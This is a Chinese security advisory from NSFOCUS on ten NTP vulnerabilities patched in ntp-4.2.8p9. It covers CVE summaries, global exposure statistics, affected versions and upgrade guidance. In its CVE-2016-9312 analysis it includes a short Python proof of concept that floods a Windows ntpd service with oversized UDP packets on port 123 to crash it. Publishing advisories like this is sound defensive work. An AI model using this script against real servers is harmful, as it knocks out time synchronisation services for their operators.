【威胁通告】NTP多个漏洞

2016.11.21日,NTF’s Network Time Protocol (NTP) 项目发布了 ntp-4.2.8p9 ,这是 ntp-4.2.8p8 发布以来的第一次更新。此次更新发布了10个漏洞,其中1个高危,具体信息如下:

  • 1 个高危漏洞,仅影响Windows
  • 2 MEDIUM severity vulnerabilities
  • 2 MEDIUM/LOW severity vulnerabilities
  • 5 LOW severity vulnerabilities
  • 28 non-security fixes and improvements

具体通告内容

2016年11月21日(当地时间),nwtime.org网站发布了一条关于NTF(Network Time Foundation)的网络时间协议(NTP)项目版本更新的消息,在新版本ntp-4.2.8p9中修复了NTP的多个漏洞,其中部分漏洞可以造成远程拒绝服务。这些漏洞见下表

CVE-2016-9311

ntpd默认不启用trap,然而当trap被启用的时候,攻击者可以发送一个精心构造的数据包造成空指针解引用,从而导致ntpd拒绝服务。

CVE-2016-9310

一个可利用的配置修改漏洞存在于ntpd的控制模式功能中,攻击者可以通过发送精心构造的控制模式数据包造成信息泄露和拒绝服务攻击。

CVE-2016-7427

如果攻击者可以访问NTP广播域,那么他可以周期性地向广播域中发送精心构造的数据包,从而迫使nptd从合法的NTP广播服务器发来的广播模式数据包。

CVE-2016-7428

ntpd的广播模式轮询间隔执行功能中存在一个可利用的拒绝服务攻击。一个可以接触NTP广播域的攻击者可以向NTP广播域中发送精心构造的数据包从而迫使ntpd丢弃从合法NTP广播服务器发来的广播模式数据包。

CVE-2016-9312

Windows上的ntpd在接收过大的UDP数据包时会停止工作,导致拒绝服务。

CVE-2016-7431

ntp-4.2.8p6修复了编号为NTP Bug 2945的零值原始时间戳的bug,然而却引入了对零值原始时间戳检验不当的问题。

CVE-2016-7434

如果ntpd被配置为接收mrulist查询请求,攻击者则可以发送一个精心构造的mrulist查询请求包,导致ntpd崩溃,造成拒绝服务。

CVE-2016-7429

如果ntpd运行于在不同网络使用多重接口的主机上,且操作系统对收到的数据包并不检查来源地址的情况下,攻击者可以伪造数据包的源地址,导致ntpd无法和正确数据源同步。

CVE-2016-7426

在ntpd启用速率限定的情况下,攻击者可以周期性地发送带有伪造源地址的数据包,阻止ntpd接收有效的nptd响应包。

CVE-2016-7433

先前对编号为NTP Bug 2085的bug修复不正确,相关计算有误。Bug 2085引起的问题是时基误差高于所期望的值。

详情请见如下链接:

http://nwtime.org/ntp428p9_release/

什么是NTP

在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络时间协议)是用来使网络中的各个计算机时间同步的一种协议。它的用途是把计算机的时钟同步到世界协调时UTC,其精度在局域网内可达0.1ms,在互联网上绝大多数的地方其精度可以达到1-50ms。(引用自《百度百科》)

绿盟威胁情报中心NTI对NTP多个漏洞全球影响分析

全球漏洞分布情况

截止到今天,我们统计全球范围内存在此安全漏洞的设备数量已经达到213,664个。这些受此漏洞影响的设备数量最多的国家是加拿大,占全部的24.60%,其次是韩国,占20.09%,第三是美国,占16.77%,剩余国家分别是俄罗斯联邦、中国、巴西、日本、英国、德国、法国等。

TOP20国家的受此漏洞影响的设备数量占全球总数的93%,其余7%分散在其他国家和地区内。

图1 受此漏洞影响的设备全球分布图

图2 全球受此漏洞影响的分布国家TOP20占比

中国地区受此漏洞影响的设备分布情况

中国各省份及地区分布的受此漏洞影响的设备总数量达13,157个。其中台湾地区所占数量最多,有3055台设备受影响,其次是江苏、北京、香港等地区。

TOP10省份的受此漏洞影响的设备数量占中国总数的52%。其余48%的数量分散于其他省份或地区内。

图3 受此漏洞影响的设备中国各省份及地区分布图

图4 受此漏洞影响的设备中国TOP10省份排名

受影响的版本及修复情况

漏洞编号 受影响版本 不受影响版本
CVE-2016-9311 ntp-4.0.90 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-9310 ntp-4.0.90 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7427 ntp-4.2.8p6 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7428 ntp-4.2.8p6 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-9312 nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7431 ntp-4.2.8p8;ntp-4.3.93 ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7434 ntp-4.2.7p22 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7429 ntp-4.2.7p385 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7426 ntp-4.2.5p203 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94
CVE-2016-7433 ntp-4.2.7p385 <= nptd version < ntp-4.2.8p9

ntp-4.3.0 <= ntpd version < ntp-4.3.94

ntp-4.2.8p9;ntp-4.3.94

漏洞分析

高危

CVE-2016-9312

当运行在Windows系统上的存在漏洞的ntpd服务程序接收到一个恶意请求包时,ntpd服务程序将会停止服务。此漏洞仅存在于Windows系统的ntpd服务程序。ntpd服务程序在处理包含扩展字段的ntp请求包时存在缺陷,当扩展字段超长时,引发ntpd服务处理数据包错误,导致ntpd服务终止。

测试步骤

  1. ntpd服务正常运行在123端口,对外提供网络授时服务。

图5 ntpd监听的端口

  1. 当向ntpd服务程序发送包含扩展字段的超长ntp请求包时,会引发其内部处理错误。

POC如下

#!/usr/bin/python3

from socket import *

from time import sleep

host = “192.168.xxx.xxx”

sock = socket(AF_INET, SOCK_DGRAM)

for n in range(10):

raw = b”1234567890″ + b”AAAAAAAAAA” * 1000

sock.sendto(raw, (host, 123))

sleep(1.0)

图6 抓包信息

  1. 通过Windows事件管理器,可以看到具体错误信息。同时在进程管理器中,ntpd程序已终止退出。

图7 事件管理器

中危

CVE-2016-9311

一个可被利用的拒绝服务漏洞存在于ntpd服务的trap功能中,当ntpd启用trap功能时,攻击者可以发送特制网络数据包导致空指针解引用,使得ntpd崩溃造成拒绝服务。

图8 CVE-2016-9311补丁截图

CVE-2016-9310

ntpd的控制模式(模式6)功能中存在可利用的配置修改漏洞。特制的控制模式可以设置ntpd的trap服务,造成信息泄露和DDoS,并可以取消设置ntpd陷阱,禁用合法监控。未经身份验证的远程网络攻击者可以触发此漏洞。ntpd提供了一个trap功能,当发生感兴趣的事件时,它会向多个“陷阱接收器”发送异步消息。 感兴趣的示例事件包括:关联动员和遣散,认证失败,可达性改变等。

图9 CVE-2016-9310补丁截图

在patch信息中,为trap的设置和取消都指定为AUTH

CVE-2016-7427

NTP广播模式中存在拒绝服务漏。 NTP的broadcast模式仅在可信网络中使用, 如果broadcast网络可被攻击者访问,则可以滥用ntpd的广播模式重放阻止功能中的潜在可利用的拒绝服务漏洞。 具有访问NTP广播域的攻击者可以定期将特制广播模式NTP数据包注入广播域,在ntpd记录时,可以导致ntpd拒绝来自合法NTP广播服务器的广播模式数据包。

CVE-2016-7428

NTP广播模式中存在拒绝服务漏。 NTP的广播模式预计仅在可信网络中使用。 如果广播网络可被攻击者访问,则可以滥用ntpd的广播模式轮询间隔实施功能中的潜在可利用的拒绝服务漏洞。 为了限制滥用,ntpd限制每个广播关联将处理传入分组的速率。 ntpd将拒绝在前一个广播包中指定的轮询间隔到达之前到达的广播模式包。 访问NTP广播域的攻击者可以将特制的广播模式NTP包发送到广播域,广播域在通过ntpd进行日志记录时将导致ntpd拒绝来自合法NTP广播服务器的广播模式包。

图10 CVE-2016-7428漏洞代码截图

规避方案

官方已经发布了版本更新,建议用户升级到最新版本,下载链接如下:

http://support.ntp.org/bin/view/Main/SoftwareDownloads

 

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防研究,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易,股票简称:绿盟科技,股票代码:300369。

如果您需要了解更多内容,可以
加入QQ群:486207500、570982169
直接询问:010-68438880-8669

Spread the word. Share this post!

Meet The Author

Leave Comment